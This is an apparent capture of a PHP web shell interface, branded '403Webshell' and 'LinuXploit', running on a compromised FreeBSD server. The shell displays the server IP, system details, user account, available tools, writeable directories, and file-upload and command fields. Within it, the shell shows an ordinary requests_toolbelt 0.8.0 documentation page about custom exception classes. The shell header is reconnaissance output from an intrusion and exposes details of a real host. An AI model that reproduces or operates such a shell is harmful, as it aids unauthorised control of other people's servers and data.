403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/share/doc/requests-toolbelt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/share/doc/requests-toolbelt//exceptions.html

<!DOCTYPE html>
<!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
<head>
  <meta charset="utf-8">
  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
  <title>Custom Toolbelt Exceptions &mdash; requests_toolbelt 0.8.0 documentation</title>
  

  
  
  
  

  
  <script type="text/javascript" src="_static/js/modernizr.min.js"></script>
  
    
      <script type="text/javascript">
          var DOCUMENTATION_OPTIONS = {
              URL_ROOT:'./',
              VERSION:'0.8.0',
              LANGUAGE:'None',
              COLLAPSE_INDEX:false,
              FILE_SUFFIX:'.html',
              HAS_SOURCE:  true,
              SOURCELINK_SUFFIX: '.txt'
          };
      </script>
        <script type="text/javascript" src="_static/jquery.js"></script>
        <script type="text/javascript" src="_static/underscore.js"></script>
        <script type="text/javascript" src="_static/doctools.js"></script>
    
    <script type="text/javascript" src="_static/js/theme.js"></script>

    

  
  <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
  <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
    <link rel="index" title="Index" href="genindex.html" />
    <link rel="search" title="Search" href="search.html" />
    <link rel="next" title="Specialized Sessions" href="sessions.html" />
    <link rel="prev" title="Utilities for Enhanced Form-Data Serialization" href="formdata.html" /> 
</head>

<body class="wy-body-for-nav">

   
  <div class="wy-grid-for-nav">
    
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >
          

          
            <a href="index.html" class="icon icon-home"> requests_toolbelt
          

          
          </a>

          
            
            
              <div class="version">
                0.8.0
              </div>
            
          

          
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>

          
        </div>

        <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
          
            
            
              
            
            
              <ul>
<li class="toctree-l1"><a class="reference internal" href="user.html">requests toolbelt</a></li>
<li class="toctree-l1"><a class="reference internal" href="contributing.html">Contributing to this project</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="adapters.html">Transport Adapters</a></li>
<li class="toctree-l1"><a class="reference internal" href="authentication.html">Authentication</a></li>
<li class="toctree-l1"><a class="reference internal" href="deprecated.html">Deprecated Requests Utilities</a></li>
<li class="toctree-l1"><a class="reference internal" href="downloadutils.html">Utilities for Downloading Streaming Responses</a></li>
<li class="toctree-l1"><a class="reference internal" href="dumputils.html">Utilities for Dumping Information About Responses</a></li>
<li class="toctree-l1"><a class="reference internal" href="formdata.html">Utilities for Enhanced Form-Data Serialization</a></li>
<li class="toctree-l1 current"><a class="current reference internal" href="#">Custom Toolbelt Exceptions</a></li>
<li class="toctree-l1"><a class="reference internal" href="sessions.html">Specialized Sessions</a></li>
<li class="toctree-l1"><a class="reference internal" href="threading.html">Using requests with Threading</a></li>
<li class="toctree-l1"><a class="reference internal" href="uploading-data.html">Uploading Data</a></li>
<li class="toctree-l1"><a class="reference internal" href="user-agent.html">User-Agent Constructor</a></li>
</ul>

            
          
        </div>
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">

      
      <nav class="wy-nav-top" aria-label="top navigation">
        
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="index.html">requests_toolbelt</a>
        
      </nav>


      <div class="wy-nav-content">
        
        <div class="rst-content">
        
          















<div role="navigation" aria-label="breadcrumbs navigation">

  <ul class="wy-breadcrumbs">
    
      <li><a href="index.html">Docs</a> &raquo;</li>
        
      <li>Custom Toolbelt Exceptions</li>
    
    
      <li class="wy-breadcrumbs-aside">
        
            
            <a href="_sources/exceptions.rst.txt" rel="nofollow"> View page source</a>
          
        
      </li>
    
  </ul>

  
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
            
  <div class="section" id="custom-toolbelt-exceptions">
<span id="exceptions"></span><h1>Custom Toolbelt Exceptions<a class="headerlink" href="#custom-toolbelt-exceptions" title="Permalink to this headline">¶</a></h1>
<p>Below are the exception classes used by the toolbelt to provide error details
to the user of the toolbelt.</p>
<span class="target" id="module-requests_toolbelt.exceptions"></span><p>Collection of exceptions raised by requests-toolbelt.</p>
<dl class="exception">
<dt id="requests_toolbelt.exceptions.IgnoringGAECertificateValidation">
<em class="property">exception </em><code class="descclassname">requests_toolbelt.exceptions.</code><code class="descname">IgnoringGAECertificateValidation</code><a class="headerlink" href="#requests_toolbelt.exceptions.IgnoringGAECertificateValidation" title="Permalink to this definition">¶</a></dt>
<dd><p>Used to indicate that given GAE validation behavior will be ignored.</p>
<p>If the user has tried to specify certificate validation when using the
insecure AppEngine adapter, it will be ignored (certificate validation will
remain off), so we will issue this warning to the user.</p>
<p>In <code class="xref py py-class docutils literal"><span class="pre">requests_toolbelt.adapters.appengine.InsecureAppEngineAdapter</span></code>.</p>
</dd></dl>

<dl class="exception">
<dt id="requests_toolbelt.exceptions.RequestsVersionTooOld">
<em class="property">exception </em><code class="descclassname">requests_toolbelt.exceptions.</code><code class="descname">RequestsVersionTooOld</code><a class="headerlink" href="#requests_toolbelt.exceptions.RequestsVersionTooOld" title="Permalink to this definition">¶</a></dt>
<dd><p>Used to indicate that the Requests version is too old.</p>
<p>If the version of Requests is too old to support a feature, we will issue
this warning to the user.</p>
</dd></dl>

<dl class="exception">
<dt id="requests_toolbelt.exceptions.StreamingError">
<em class="property">exception </em><code class="descclassname">requests_toolbelt.exceptions.</code><code class="descname">StreamingError</code><a class="headerlink" href="#requests_toolbelt.exceptions.StreamingError" title="Permalink to this definition">¶</a></dt>
<dd><p>Used in <code class="xref py py-mod docutils literal"><span class="pre">requests_toolbelt.downloadutils.stream</span></code>.</p>
</dd></dl>

<dl class="exception">
<dt id="requests_toolbelt.exceptions.VersionMismatchError">
<em class="property">exception </em><code class="descclassname">requests_toolbelt.exceptions.</code><code class="descname">VersionMismatchError</code><a class="headerlink" href="#requests_toolbelt.exceptions.VersionMismatchError" title="Permalink to this definition">¶</a></dt>
<dd><p>Used to indicate a version mismatch in the version of requests required.</p>
<p>The feature in use requires a newer version of Requests to function
appropriately but the version installed is not sufficient.</p>
</dd></dl>

</div>


           </div>
           
          </div>
          <footer>
  
    <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
      
        <a href="sessions.html" class="btn btn-neutral float-right" title="Specialized Sessions" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right"></span></a>
      
      
        <a href="formdata.html" class="btn btn-neutral float-left" title="Utilities for Enhanced Form-Data Serialization" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left"></span> Previous</a>
      
    </div>
  

  <hr/>

  <div role="contentinfo">
    <p>
        &copy; Copyright 2015, Ian Cordasco, Cory Benfield

    </p>
  </div>
  Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. 

</footer>

        </div>
      </div>

    </section>

  </div>
  


  <script type="text/javascript">
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(true);
      });
  </script>

  
  
    
   

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit